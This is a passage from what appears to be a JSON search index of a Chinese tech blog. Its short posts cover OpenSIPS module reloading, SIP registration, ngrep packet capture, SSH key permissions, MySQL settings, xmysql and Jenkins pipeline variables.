--with-pcap make \u0026amp;\u0026amp; make install sipp -v SIPp v3.4-beta1 (aka v3.3.990)-SCTP-PCAP built Oct 6 2019, 20:12:17. 
This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.","title":"SIPp:sip压测模拟ua工具"},{"content":"编译器面无表情的说:xxx.cfg 189行,有个地方多了个分号?\n但是你在xxx.cfg的第189行哼哧哼哧找了半天,满头大汗,也没发现有任何问题,这一行甚至连个分号都没有!!\n而实际上,这个问题并不是出在第189行,而是出在前面几行。\n所以说,编译器和女朋友的相同之处在于:**他们说的话,你不能全信,也不能不信。**而要从他们说的话中分析上下文,从蛛丝马迹中,寻求唯一的真相。\n","permalink":"https://wdd.js.org/posts/2019/09/myy94p/","summary":"编译器面无表情的说:xxx.cfg 189行,有个地方多了个分号?\n但是你在xxx.cfg的第189行哼哧哼哧找了半天,满头大汗,也没发现有任何问题,这一行甚至连个分号都没有!!\n而实际上,这个问题并不是出在第189行,而是出在前面几行。\n所以说,编译器和女朋友的相同之处在于:**他们说的话,你不能全信,也不能不信。**而要从他们说的话中分析上下文,从蛛丝马迹中,寻求唯一的真相。","title":"编译器和女朋友有什么相同之处"},{"content":" 参考 https://blog.opensips.org/2017/03/22/capturing-beyond-sip/ http://www.sipcapture.org/ https://github.com/sipcapture/homer/wiki ","permalink":"https://wdd.js.org/opensips/ch5/homer6/","summary":" 参考 https://blog.opensips.org/2017/03/22/capturing-beyond-sip/ http://www.sipcapture.org/ https://github.com/sipcapture/homer/wiki ","title":"opensips 集成 homer6"},{"content":"常见的问题 有时候如果你直接在数据库中改动某些值,但是opensips并没有按照预设的值去执行,那么你就要尝试使用mi命令去reload相关模块。\n有缓存模块 opensips在启动时,会将某些模块所使用的表一次性全部加载到内存,状态变化时,再回写到数据库。有以下模块列表:\ndispatcher load_balancer carrierroute dialplan \u0026hellip; 判断一个模块是否是一次性加载到内存的,有个简便方法,看这个模块是否提供类似于 xx_reload的mi接口,有reload的mi接口,就说明这个模块是使用一次性读取,变化回写的方式读写数据库。\n将模块一次性加载到内存的好处是不用每次都查数据库,运行速度会大大提升。\n以dispatcher为例子,opensips在启动时会从数据库中加载一系列的目标到内存中,然后按照设定值,周期性的向目标发送options包,如果目标挂掉,三次未响应,opensips将会将该目标的状态设置为非0值,表示该地址不可用,同时将该状态回写到数据库。\n无缓存模块 无缓存的模块每次都会向数据库查询数据。常见的模块有alias_db,该模块的说明\nALIAS_DB module can be used as an alternative for user aliases via usrloc. 
The main feature is that it does not store all adjacent data as for user location and always uses database for search (no memory caching).\nALIAS_DB一般用于呼入时接入号的查询,在多租户的情况下,如果大多数租户都是使用呼入的场景,那么ALIAS_DB模块可能会是一个性能瓶颈,建议将该模块使用一些内存数据库替代。\n从浏览器reload模块 opensips在加载了httpd和mi_http模块之后,可以在opensips主机的8888端口访问到管理页面,具体地址如:http://opensips_host:8888/mi\n这个页面可以看到opensips所加载的模块,然后我们点击carrierroute, 可以看到该模块所支持的管理命令列表,如下图左侧列表所示,其中cr_reload_routes就是一个管理命令。\n然后我们点击cr_reload_routes链接,跳转到下图所示页面。参数可以不用填写,直接点击submit就可以。正常情况下会返回 200 : OK,就说明reload模块成功。\n使用curl命令reload模块 如果因为某些原因,无法访问web界面,那么可以使用curl等http命令行工具执行curl命令,例如\ncurl http://192.168.40.98:8888/mi/carrierroute/cr_reload_routes?arg= ","permalink":"https://wdd.js.org/opensips/ch3/cache-reload/","summary":"常见的问题 有时候如果你直接在数据库中改动某些值,但是opensips并没有按照预设的值去执行,那么你就要尝试使用mi命令去reload相关模块。\n有缓存模块 opensips在启动时,会将某些模块所使用的表一次性全部加载到内存,状态变化时,再回写到数据库。有以下模块列表:\ndispatcher load_balancer carrierroute dialplan \u0026hellip; 判断一个模块是否是一次性加载到内存的,有个简便方法,看这个模块是否提供类似于 xx_reload的mi接口,有reload的mi接口,就说明这个模块是使用一次性读取,变化回写的方式读写数据库。\n将模块一次性加载到内存的好处是不用每次都查数据库,运行速度会大大提升。\n以dispatcher为例子,opensips在启动时会从数据库中加载一系列的目标到内存中,然后按照设定值,周期性的向目标发送options包,如果目标挂掉,三次未响应,opensips将会将该目标的状态设置为非0值,表示该地址不可用,同时将该状态回写到数据库。\n无缓存模块 无缓存的模块每次都会向数据库查询数据。常见的模块有alias_db,该模块的说明\nALIAS_DB module can be used as an alternative for user aliases via usrloc. 
The main feature is that it does not store all adjacent data as for user location and always uses database for search (no memory caching).\nALIAS_DB一般用于呼入时接入号的查询,在多租户的情况下,如果大多数租户都是使用呼入的场景,那么ALIAS_DB模块可能会是一个性能瓶颈,建议将该模块使用一些内存数据库替代。\n从浏览器reload模块 opensips在加载了httpd和mi_http模块之后,可以在opensips主机的8888端口访问到管理页面,具体地址如:http://opensips_host:8888/mi\n这个页面可以看到opensips所加载的模块,然后我们点击carrierroute, 可以看到该模块所支持的管理命令列表,如下图左侧列表所示,其中cr_reload_routes就是一个管理命令。\n然后我们点击cr_reload_routes链接,跳转到下图所示页面。参数可以不用填写,直接点击submit就可以。正常情况下会返回 200 : OK,就说明reload模块成功。\n使用curl命令reload模块 如果因为某些原因,无法访问web界面,那么可以使用curl等http命令行工具执行curl命令,例如\ncurl http://192.168.40.98:8888/mi/carrierroute/cr_reload_routes?arg= ","title":"模块缓存策略与reload方法"},{"content":" sequenceDiagram autonumber participant a as 192.168.0.123:55647 participant b as 1.2.3.4:5060 participant c as 172.10.10.3:49543 a-\u003e\u003eb: register cseq=1, callId=1 b--\u003e\u003ea: 401 Unauthorized a-\u003e\u003eb: register cseq=2, callid=1 b--\u003e\u003ea: 200 a-\u003e\u003eb: register cseq=3, callId=1 b--\u003e\u003ea: 401 Unauthorized a-\u003e\u003eb: register cseq=4, callid=1 b--\u003e\u003ea: 200 c-\u003e\u003eb: register cseq=5, callid=1 b--\u003e\u003ec: 401 Unauthorized c-\u003e\u003eb: register cseq=6, callid=1 b--\u003e\u003ec: 500 Service Unavailable c-\u003e\u003eb: register cseq=7, callid=2 b--\u003e\u003ec: 401 Unauthorized c-\u003e\u003eb: register cseq=8, callid=2 b--\u003e\u003ec: 200 c-\u003e\u003eb: register cseq=9, callid=2 b--\u003e\u003ec: 401 Unauthorized c-\u003e\u003eb: register cseq=10, callid=2 b--\u003e\u003ec: 200 c-\u003e\u003eb: register cseq=11, callid=2 b--\u003e\u003ec: 401 Unauthorized c-\u003e\u003eb: register cseq=12, callid=2 b--\u003e\u003ec: 500 Service Unavailable a-\u003e\u003eb: register cseq=13, callId=3 b--\u003e\u003ea: 401 Unauthorized a-\u003e\u003eb: register cseq=14, callid=3 b--\u003e\u003ea: 200 a-\u003e\u003eb: register cseq=15, callId=3 b--\u003e\u003ea: 401 Unauthorized a-\u003e\u003eb: register cseq=16, 
callid=3 b--\u003e\u003ea: 200 a-\u003e\u003eb: register cseq=17, callId=3 b--\u003e\u003ea: 401 Unauthorized a-\u003e\u003eb: register cseq=18, callid=3 b--\u003e\u003ea: 200 a-\u003e\u003eb: register cseq=19, callId=3 b--\u003e\u003ea: 401 Unauthorized a-\u003e\u003eb: register cseq=20, callid=3 b--\u003e\u003ea: 200 服务端设置的过期时间是120s 客户端每隔115s注册一次, callid和之前的保持不变 当网络变了之后,由于ip地址改变,客户端在115秒时注册,此时服务端还未超时,所以给客户端响应报错500 客户端在等了8秒之后,等待服务端超时,然后再次注册,再次注册时,callid改变 因为服务端已经超时,所以能够注册成功 需要注意的是,在一个注册周期内,客户端的注册信息包括IP、端口、协议、CallID都不能变。一旦改变了,如果服务端的记录还没有失效,新的注册就会失败。\n有的客户会经常反馈,他们的分机总是无故掉线。经过抓包分析,发现分机每隔1.5分钟注册一次,使用tcp注册的,每次的端口号都会变成不同的值。\n然后尝试让分机用udp注册,分机就不再异常掉线了。\n一个tcp socket一旦关闭,新的tcp socket必然会被分配不同的端口。但是udp不一样,udp是无连接的。\n","permalink":"https://wdd.js.org/opensips/ch1/sip-register/","summary":" sequenceDiagram autonumber participant a as 192.168.0.123:55647 participant b as 1.2.3.4:5060 participant c as 172.10.10.3:49543 a-\u003e\u003eb: register cseq=1, callId=1 b--\u003e\u003ea: 401 Unauthorized a-\u003e\u003eb: register cseq=2, callid=1 b--\u003e\u003ea: 200 a-\u003e\u003eb: register cseq=3, callId=1 b--\u003e\u003ea: 401 Unauthorized a-\u003e\u003eb: register cseq=4, callid=1 b--\u003e\u003ea: 200 c-\u003e\u003eb: register cseq=5, callid=1 b--\u003e\u003ec: 401 Unauthorized c-\u003e\u003eb: register cseq=6, callid=1 b--\u003e\u003ec: 500 Service Unavailable c-\u003e\u003eb: register cseq=7, callid=2 b--\u003e\u003ec: 401 Unauthorized c-\u003e\u003eb: register cseq=8, callid=2 b--\u003e\u003ec: 200 c-\u003e\u003eb: register cseq=9, callid=2 b--\u003e\u003ec: 401 Unauthorized c-\u003e\u003eb: register cseq=10, callid=2 b--\u003e\u003ec: 200 c-\u003e\u003eb: register cseq=11, callid=2 b--\u003e\u003ec: 401 Unauthorized c-\u003e\u003eb: register cseq=12, callid=2 b--\u003e\u003ec: 500 Service Unavailable a-\u003e\u003eb: register cseq=13, callId=3 b--\u003e\u003ea: 401 Unauthorized a-\u003e\u003eb: register cseq=14, callid=3 b--\u003e\u003ea: 200 a-\u003e\u003eb: register cseq=15, 
callId=3 b--\u003e\u003ea: 401 Unauthorized a-\u003e\u003eb: register cseq=16, callid=3 b--\u003e\u003ea: 200 a-\u003e\u003eb: register cseq=17, callId=3 b--\u003e\u003ea: 401 Unauthorized a-\u003e\u003eb: register cseq=18, callid=3 b--\u003e\u003ea: 200 a-\u003e\u003eb: register cseq=19, callId=3 b--\u003e\u003ea: 401 Unauthorized a-\u003e\u003eb: register cseq=20, callid=3 b--\u003e\u003ea: 200 服务端设置的过期时间是120s 客户端每隔115s注册一次, callid和之前的保持不变 当网络变了之后,由于ip地址改变,客户端的在115秒注册,此时服务端还未超时,所以给客户端响应报错500 客户端在等了8秒之后,等待服务端超时,然后再次注册,再次注册时,callid改变 因为服务端已经超时,所以能够注册成功 需要注意的是,在一个注册周期内,客户端的注册信息包括IP、端口、协议、CallID都不能变,一旦改变了。如果服务端的记录还没有失效,新的注册就会失败。","title":"SIP注册调研"},{"content":"报错信息如下\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ WARNING: UNPROTECTED PRIVATE KEY FILE! @ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Permissions 0644 for \u0026#39;mmmmm\u0026#39; are too open. It is required that your private key files are NOT accessible by others. This private key will be ignored. 解决方案:将你的私钥的权限改为600, 也就是说只有你自己可读可写,其他人都不能用\nchmod 600 你的私钥 ","permalink":"https://wdd.js.org/posts/2019/08/vhovcg/","summary":"报错信息如下\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ WARNING: UNPROTECTED PRIVATE KEY FILE! @ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Permissions 0644 for \u0026#39;mmmmm\u0026#39; are too open. It is required that your private key files are NOT accessible by others. This private key will be ignored. 
解决方案:将你的私钥的权限改为600, 也就是说只有你自己可读可写,其他人都不能用\nchmod 600 你的私钥 ","title":"ssh 私钥使用失败"},{"content":"两种头 via headers 响应按照Via字段向前走 route headers 请求按照route字段向前走 Via头 当uac发送请求时, 每个ua都会加上自己的via头, via都的顺序很重要,每个节点都需要将自己的Via头加在最上面 响应消息按照via头记录的地址返回,每次经过自己的node时候,要去掉自己的via头 via用来指明消息应该按照什么 Route头 路由模块 模块 CARRIERROUTE DISPATCHER DROUTING LOAD_BALANCER ","permalink":"https://wdd.js.org/opensips/ch5/via-route/","summary":"两种头 via headers 响应按照Via字段向前走 route headers 请求按照route字段向前走 Via头 当uac发送请求时, 每个ua都会加上自己的via头, via都的顺序很重要,每个节点都需要将自己的Via头加在最上面 响应消息按照via头记录的地址返回,每次经过自己的node时候,要去掉自己的via头 via用来指明消息应该按照什么 Route头 路由模块 模块 CARRIERROUTE DISPATCHER DROUTING LOAD_BALANCER ","title":"SIP路由头"},{"content":"一般使用tcpdump抓包,然后将包文件下载到本机,用wireshark去解析过滤。\n但是这样会显得比较麻烦。\nngrep可以直接在linux转包,明文查看http的请求和响应信息。\n安装 apt install ngrep # debian yum install ngrep # centos7 # 如果centos报错没有ngrep, 那么执行下面的命令, 然后再安装 rpm -ivh http://dl.fedoraproject.org/pub/epel/epel-release-latest-7.noarch.rpm HTTP抓包 -W byline 头信息会自动换行 host 192.168.60.200 是过滤规则 源ip或者目的ip是192.168.60.200 ngrep -W byline host 192.168.60.200 interface: eth0 (192.168.1.0/255.255.255.0) filter: (ip or ip6) and ( host 192.168.60.200 ) #### T 192.168.1.102:39510 -\u0026gt; 192.168.60.200:7775 [AP] GET / HTTP/1.1. Host: 192.168.60.200:7775. User-Agent: curl/7.52.1. Accept: */*. . # T 192.168.60.200:7775 -\u0026gt; 192.168.1.102:39510 [AP] HTTP/1.1 302 Moved Temporarily. Server: Apache-Coyote/1.1. Set-Cookie: JSESSIONID=211CA612EC681B9FDCE7726B03F42088; Path=/; HttpOnly. Location: http://192.168.60.200:7775/homepage.action. Content-Type: text/html. Content-Length: 0. Date: Fri, 16 Aug 2019 02:16:51 GMT. 
过滤规则 按IP地址过滤 ngrep -W byline host 192.168.60.200 # 源地址或者目的地址是 192.168.60.200 按端口过滤 ngrep -W byline port 80 # 源端口或者目的端口是 80 按照正则匹配 ngrep -W byline -q HTTP # 匹配所有包中含有HTTP的 指定网卡 默认情况下,ngrep使用网卡列表中的一个网卡,当然你也可以使用-d选项来指定从某个网卡抓包。\nngrep -W byline -d eth0 host 192.168.60.200 参考 https://www.tecmint.com/ngrep-network-packet-analyzer-for-linux/ https://github.com/jpr5/ngrep ","permalink":"https://wdd.js.org/network/pxn896/","summary":"一般使用tcpdump抓包,然后将包文件下载到本机,用wireshark去解析过滤。\n但是这样会显得比较麻烦。\nngrep可以直接在linux上抓包,明文查看http的请求和响应信息。\n安装 apt install ngrep # debian yum install ngrep # centos7 # 如果centos报错没有ngrep, 那么执行下面的命令, 然后再安装 rpm -ivh http://dl.fedoraproject.org/pub/epel/epel-release-latest-7.noarch.rpm HTTP抓包 -W byline 头信息会自动换行 host 192.168.60.200 是过滤规则 源ip或者目的ip是192.168.60.200 ngrep -W byline host 192.168.60.200 interface: eth0 (192.168.1.0/255.255.255.0) filter: (ip or ip6) and ( host 192.168.60.200 ) #### T 192.168.1.102:39510 -\u0026gt; 192.168.60.200:7775 [AP] GET / HTTP/1.1. Host: 192.168.60.200:7775. User-Agent: curl/7.52.1. Accept: */*. . 
# T 192.168.60.200:7775 -\u0026gt; 192.168.1.102:39510 [AP] HTTP/1.1 302 Moved Temporarily.","title":"ngrep明文http抓包教程"},{"content":"一般拷贝全文分为以下几步\n使用编辑器打开文件 全文选择文件 执行拷贝命令 实际上操作系统提供了一些命令,可以在不打开文件的情况下,将文件内容复制到剪贴板。\nmac pbcopy cat aaa.txt | pbcopy linux xsel cat aaa.txt | xsel windows clip cat aaa.txt | clip ","permalink":"https://wdd.js.org/posts/2019/08/iyotwd/","summary":"一般拷贝全文分为以下几步\n使用编辑器打开文件 全文选择文件 执行拷贝命令 实际上操作系统提供了一些命令,可以在不打开文件的情况下,将文件内容复制到剪贴板。\nmac pbcopy cat aaa.txt | pbcopy linux xsel cat aaa.txt | xsel windows clip cat aaa.txt | clip ","title":"在不打开文件,将全文复制到剪贴板"},{"content":"解决方案 方案1: sudo kill -9 `ps aux | grep -v grep | grep /usr/libexec/airportd | awk \u0026#39;{print $2}\u0026#39;` 或者任务管理器搜索并且杀掉airportd这个进程\n参考 https://discussionschinese.apple.com/thread/140138832?answerId=140339277322#140339277322 https://www.v2ex.com/t/505737 https://blog.csdn.net/Goals1989/article/details/88578012 ","permalink":"https://wdd.js.org/posts/2019/08/gw9eka/","summary":"解决方案 方案1: sudo kill -9 `ps aux | grep -v grep | grep /usr/libexec/airportd | awk \u0026#39;{print $2}\u0026#39;` 或者任务管理器搜索并且杀掉airportd这个进程\n参考 https://discussionschinese.apple.com/thread/140138832?answerId=140339277322#140339277322 https://www.v2ex.com/t/505737 https://blog.csdn.net/Goals1989/article/details/88578012 ","title":"macbook pro 开机后wifi无响应问题调研"},{"content":"编辑/etc/my.cnf,增加skip-name-resolve\nskip-name-resolve 然后重启mysql\n","permalink":"https://wdd.js.org/posts/2019/08/kieuga/","summary":"编辑/etc/my.cnf,增加skip-name-resolve\nskip-name-resolve 然后重启mysql","title":"mysql远程连接速度太慢"},{"content":"github向我推荐这个xmysql时候,我瞟了一眼它的简介One command to generate REST APIs for any MySql Database, 说实话这个介绍让我眼前一亮,想想每次向后端的同学要个接口的时候,他们总是要哼哧哼哧搞个半天给才能我。抱着试试看的心态,我试用了一个疗程,oh不是, 是安装并使用了一下。 说实话,体验是蛮不错的,但是体验一把过后,我想不到这个工具的使用场景,因为你不可能把数据库的所有表都公开出来,让前端随意读写, 但是试试看总是不错的.\n1 来吧,冒险一次! 
安装与使用\nnpm install -g xmysql\nxmysql -h localhost -u mysqlUsername -p mysqlPassword -d databaseName\n浏览器打开:http://localhost:3000, 应该可以看到一堆json 2 特点 从任何mysql数据库生成REST API 🔥🔥 无论主键,外键,表等的命名规则如何,都提供API 🔥🔥 支持复合主键 🔥🔥 REST API通常使用:CRUD,List,FindOne,Count,Exists,Distinct 批量插入,批量删除,批量读取 🔥 关联表 翻页 排序 按字段过滤 🔥 行过滤 🔥 综合功能 Group By, Having (as query params) 🔥🔥 Group By, Having (as a separate API) 🔥🔥 Multiple group by in one API 🔥🔥🔥🔥 Chart API for numeric column 🔥🔥🔥🔥🔥🔥 Auto Chart API - (a gift for lazy while prototyping) 🔥🔥🔥🔥🔥🔥 XJOIN - (Supports any number of JOINS) 🔥🔥🔥🔥🔥🔥🔥🔥🔥 Supports views Prototyping (features available when using local MySql server only) Run dynamic queries 🔥🔥🔥 Upload single file Upload multiple files Download file 3 API 概览 HTTP Type API URL Comments GET / Gets all REST APIs GET /api/tableName Lists rows of table POST /api/tableName Create a new row PUT /api/tableName Replaces existing row with new row POST :fire: /api/tableName/bulk Create multiple rows - send object array in request body GET :fire: /api/tableName/bulk Lists multiple rows - /api/tableName/bulk?_ids=1,2,3 DELETE :fire: /api/tableName/bulk Deletes multiple rows - /api/tableName/bulk?_ids=1,2,3 GET /api/tableName/:id Retrieves a row by primary key PATCH /api/tableName/:id Updates row element by primary key DELETE /api/tableName/:id Delete a row by primary key GET /api/tableName/findOne Works as list but gets single record matching criteria GET /api/tableName/count Count number of rows in a table GET /api/tableName/distinct Distinct row(s) in table - /api/tableName/distinct?_fields=col1 GET /api/tableName/:id/exists True or false whether a row exists or not GET /api/parentTable/:id/childTable Get list of child table rows with parent table foreign key GET :fire: /api/tableName/aggregate Aggregate results of numeric column(s) GET :fire: /api/tableName/groupby Group by results of column(s) GET :fire: /api/tableName/ugroupby Multiple group by results using one call GET :fire: /api/tableName/chart Numeric 
column distribution based on (min,max,step) or(step array) or (automagic) GET :fire: /api/tableName/autochart Same as Chart but identifies which are numeric column automatically - gift for lazy while prototyping GET :fire: /api/xjoin handles join GET :fire: /dynamic execute dynamic mysql statements with params GET :fire: /upload upload single file GET :fire: /uploads upload multiple files GET :fire: /download download a file GET /api/tableName/describe describe each table for its columns GET /api/tables get all tables in database 3 更多资料 项目地址:https://github.com/o1lab/xmysql ","permalink":"https://wdd.js.org/posts/2019/08/vv5oro/","summary":"github向我推荐这个xmysql时候,我瞟了一眼它的简介One command to generate REST APIs for any MySql Database, 说实话这个介绍让我眼前一亮,想想每次向后端的同学要个接口的时候,他们总是要哼哧哼哧搞个半天给才能我。抱着试试看的心态,我试用了一个疗程,oh不是, 是安装并使用了一下。 说实话,体验是蛮不错的,但是体验一把过后,我想不到这个工具的使用场景,因为你不可能把数据库的所有表都公开出来,让前端随意读写, 但是试试看总是不错的.\n1 来吧,冒险一次! 安装与使用\nnpm install -g xmysqlxmysql -h localhost -u mysqlUsername -p mysqlPassword -d databaseName浏览器打开:http://localhost:3000, 应该可以看到一堆json 2 特点 产生REST Api从任何mysql 数据库 🔥🔥 无论主键,外键,表等的命名规则如何,都提供API 🔥🔥 支持复合主键 🔥🔥 REST API通常使用:CRUD,List,FindOne,Count,Exists,Distinct批量插入,批量删除,批量读取 🔥 关联表 翻页 排序 按字段过滤 🔥 行过滤 🔥 综合功能 Group By, Having (as query params) 🔥🔥 Group By, Having (as a separate API) 🔥🔥 Multiple group by in one API 🔥🔥🔥🔥 Chart API for numeric column 🔥🔥🔥🔥🔥🔥 Auto Chart API - (a gift for lazy while prototyping) 🔥🔥🔥🔥🔥🔥 XJOIN - (Supports any number of JOINS) 🔥🔥🔥🔥🔥🔥🔥🔥🔥 Supports views Prototyping (features available when using local MySql server only) Run dynamic queries 🔥🔥🔥 Upload single file Upload multiple files Download file 3 API 概览 HTTP Type API URL Comments GET / Gets all REST APIs GET /api/tableName Lists rows of table POST /api/tableName Create a new row PUT /api/tableName Replaces existing row with new row POST :fire: /api/tableName/bulk Create multiple rows - send object array in request body GET :fire: /api/tableName/bulk Lists multiple rows - 
/api/tableName/bulk?","title":"xmysql 一行命令从任何mysql数据库生成REST API"},{"content":"docker The docker variable offers convenient access to Docker-related functions from a Pipeline script.Methods needing a slave will implicitly run a node {…} block if you have not wrapped them in one. It is a good idea to enclose a block of steps which should all run on the same node in such a block yourself. (If using a Swarm server, or any other specific Docker server, this probably does not matter, but if you are using the default server on localhost it likely will.)Some methods return instances of auxiliary classes which serve as holders for an ID and which have their own methods and properties. Methods taking a body return any value returned by the body itself. Some method parameters are optional and are enclosed with []. Reference:\nwithRegistry(url[, credentialsId]) {…} Specifies a registry URL such as https://docker.mycorp.com/, plus an optional credentials ID to connect to it. withServer(uri[, credentialsId]) {…} Specifies a server URI such as tcp://swarm.mycorp.com:2376, plus an optional credentials ID to connect to it. withTool(toolName) {…} Specifies the name of a Docker installation to use, if any are defined in Jenkins global configuration. If unspecified, docker is assumed to be in the $PATH of the slave agent. image(id) Creates an Image object with a specified name or ID. See below. build(image[, args]) Runs docker build to create and tag the specified image from a Dockerfile in the current directory. Additional args may be added, such as \u0026lsquo;-f Dockerfile.other \u0026ndash;pull \u0026ndash;build-arg http_proxy=http://192.168.1.1:3128 .\u0026rsquo;. Like docker build, args must end with the build context. Returns the resulting Image object. Records a FROM fingerprint in the build. Image.id The image name with optional tag (mycorp/myapp, mycorp/myapp:latest) or ID (hexadecimal hash). 
Image.run([args, command]) Uses docker run to run the image, and returns a Container which you could stop later. Additional args may be added, such as \u0026lsquo;-p 8080:8080 \u0026ndash;memory-swap=-1\u0026rsquo;. Optional command is equivalent to Docker command specified after the image. Records a run fingerprint in the build. Image.withRun[(args[, command])] {…} Like run but stops the container as soon as its body exits, so you do not need a try-finally block. Image.inside[(args)] {…} Like withRun this starts a container for the duration of the body, but all external commands (sh) launched by the body run inside the container rather than on the host. These commands run in the same working directory (normally a slave workspace), which means that the Docker server must be on localhost. Image.tag([tagname]) Runs docker tag to record a tag of this image (defaulting to the tag it already has). Will rewrite an existing tag if one exists. Image.push([tagname]) Pushes an image to the registry after tagging it as with the tag method. For example, you can use image.push \u0026rsquo;latest\u0026rsquo; to publish it as the latest version in its repository. Image.pull() Runs docker pull. Not necessary before run, withRun, or inside. Image.imageName() The id prefixed as needed with registry information, such as docker.mycorp.com/mycorp/myapp. May be used if running your own Docker commands using sh. Container.id Hexadecimal ID of a running container. Container.stop Runs docker stop and docker rm to shut down a container and remove its storage. Container.port(port) Runs docker port on the container to reveal how the port port is mapped on the host. env Environment variables are accessible from Groovy code as env.VARNAME or simply as VARNAME. You can write to such properties as well (only using the env. 
prefix):\nenv.MYTOOL_VERSION = \u0026#39;1.33\u0026#39; node { sh \u0026#39;/usr/local/mytool-$MYTOOL_VERSION/bin/start\u0026#39; } These definitions will also be available via the REST API during the build or after its completion, and from upstream Pipeline builds using the build step.However any variables set this way are global to the Pipeline build. For variables with node-specific content (such as file paths), you should instead use the withEnv step, to bind the variable only within a node block.A set of environment variables are made available to all Jenkins projects, including Pipelines. The following is a general list of variables (by name) that are available; see the notes below the list for Pipeline-specific details.\nBRANCH_NAME For a multibranch project, this will be set to the name of the branch being built, for example in case you wish to deploy to production from master but not from feature branches. CHANGE_ID For a multibranch project corresponding to some kind of change request, this will be set to the change ID, such as a pull request number. CHANGE_URL For a multibranch project corresponding to some kind of change request, this will be set to the change URL. CHANGE_TITLE For a multibranch project corresponding to some kind of change request, this will be set to the title of the change. CHANGE_AUTHOR For a multibranch project corresponding to some kind of change request, this will be set to the username of the author of the proposed change. CHANGE_AUTHOR_DISPLAY_NAME For a multibranch project corresponding to some kind of change request, this will be set to the human name of the author. CHANGE_AUTHOR_EMAIL For a multibranch project corresponding to some kind of change request, this will be set to the email address of the author. CHANGE_TARGET For a multibranch project corresponding to some kind of change request, this will be set to the target or base branch to which the change could be merged. 
BUILD_NUMBER The current build number, such as \u0026ldquo;153\u0026rdquo; BUILD_ID The current build ID, identical to BUILD_NUMBER for builds created in 1.597+, but a YYYY-MM-DD_hh-mm-ss timestamp for older builds **BUILD_DISPLAY_NAME The display name of the current build, which is something like \u0026ldquo;#153\u0026rdquo; by default. JOB_NAME Name of the project of this build, such as \u0026ldquo;foo\u0026rdquo; or \u0026ldquo;foo/bar\u0026rdquo;. (To strip off folder paths from a Bourne shell script, try: ${JOB_NAME##*/}) BUILD_TAG String of \u0026ldquo;jenkins-${JOB_NAME}-${BUILD_NUMBER}\u0026rdquo;. Convenient to put into a resource file, a jar file, etc for easier identification. EXECUTOR_NUMBER The unique number that identifies the current executor (among executors of the same machine) that’s carrying out this build. This is the number you see in the \u0026ldquo;build executor status\u0026rdquo;, except that the number starts from 0, not 1. NODE_NAME Name of the slave if the build is on a slave, or \u0026ldquo;master\u0026rdquo; if run on master NODE_LABELS Whitespace-separated list of labels that the node is assigned. WORKSPACE The absolute path of the directory assigned to the build as a workspace. JENKINS_HOME The absolute path of the directory assigned on the master node for Jenkins to store data. 
JENKINS_URL Full URL of Jenkins, like http://server:port/jenkins/ (note: only available if Jenkins URL set in system configuration) BUILD_URL Full URL of this build, like http://server:port/jenkins/job/foo/15/ (Jenkins URL must be set) JOB_URL Full URL of this job, like http://server:port/jenkins/job/foo/ (Jenkins URL must be set) The following variables are currently unavailable inside a Pipeline script: SCM-specific variables such as SVN_REVISION As an example of loading variable values from Groovy: mail to: \u0026#39;devops@acme.com\u0026#39;, subject: \u0026#34;Job \u0026#39;${JOB_NAME}\u0026#39; (${BUILD_NUMBER}) is waiting for input\u0026#34;, body: \u0026#34;Please go to ${BUILD_URL} and verify the build\u0026#34; params Exposes all parameters defined in the build as a read-only map with variously typed values. Example:\nif (params.BOOLEAN_PARAM_NAME) {doSomething()} Note for multibranch (Jenkinsfile) usage: the properties step allows you to define job properties, but these take effect when the step is run, whereas build parameter definitions are generally consulted before the build begins. As a convenience, any parameters currently defined in the job which have default values will also be listed in this map. That allows you to write, for example:properties([parameters([string(name: \u0026lsquo;BRANCH\u0026rsquo;, defaultValue: \u0026lsquo;master\u0026rsquo;)])])\ngit url: \u0026#39;…\u0026#39;, branch: params.BRANCH and be assured that the master branch will be checked out even in the initial build of a branch project, or if the previous build did not specify parameters or used a different parameter name.\ncurrentBuild The currentBuild variable may be used to refer to the currently running build. It has the following readable properties:\nnumber build number (integer) result typically SUCCESS, UNSTABLE, or FAILURE (may be null for an ongoing build) currentResult typically SUCCESS, UNSTABLE, or FAILURE. Will never be null. 
resultIsBetterOrEqualTo(String) Compares the current build result to the provided result string (SUCCESS, UNSTABLE, or FAILURE) and returns true if the current build result is better than or equal to the provided result. resultIsWorseOrEqualTo(String) Compares the current build result to the provided result string (SUCCESS, UNSTABLE, or FAILURE) and returns true if the current build result is worse than or equal to the provided result. displayName normally #123 but sometimes set to, e.g., an SCM commit identifier description additional information about the build id normally number as a string timeInMillis time since the epoch when the build was scheduled startTimeInMillis time since the epoch when the build started running duration duration of the build in milliseconds durationString a human-readable representation of the build duration previousBuild another similar object, or null nextBuild similarly absoluteUrl URL of build index page buildVariables for a non-Pipeline downstream build, offers access to a map of defined build variables; for a Pipeline downstream build, any variables set globally on env changeSets a list of changesets coming from distinct SCM checkouts; each has a kind and is a list of commits; each commit has a commitId, timestamp, msg, author, and affectedFiles each of which has an editType and path; the value will not generally be Serializable so you may only access it inside a method marked @NonCPS rawBuild a hudson.model.Run with further APIs, only for trusted libraries or administrator-approved scripts outside the sandbox; the value will not be Serializable so you may only access it inside a method marked @NonCPS Additionally, for this build only (but not for other builds), the following properties are writable: result displayName description scm Represents the SCM configuration in a multibranch project build. 
Use checkout scm to check out sources matching Jenkinsfile. You may also use this in a standalone project configured with Pipeline script from SCM, though in that case the checkout will just be of the latest revision in the branch, possibly newer than the revision from which the Pipeline script was loaded.\n参考 Global Variable Reference ","permalink":"https://wdd.js.org/posts/2019/08/tdeab2/","summary":"docker The docker variable offers convenient access to Docker-related functions from a Pipeline script. Methods needing a slave will implicitly run a node {…} block if you have not wrapped them in one. It is a good idea to enclose a block of steps which should all run on the same node in such a block yourself. (If using a Swarm server, or any other specific Docker server, this probably does not matter, but if you are using the default server on localhost it likely will.","title":"Jenkins 全局变量参考"},{"content":"使用 jenkins 作为打包的工具,主机上的磁盘空间总是慢慢被占满,直到 jenkins 无法运行。本文从几个方面来清理 docker 垃圾。\n批量删除已经退出的容器 docker ps -a | grep 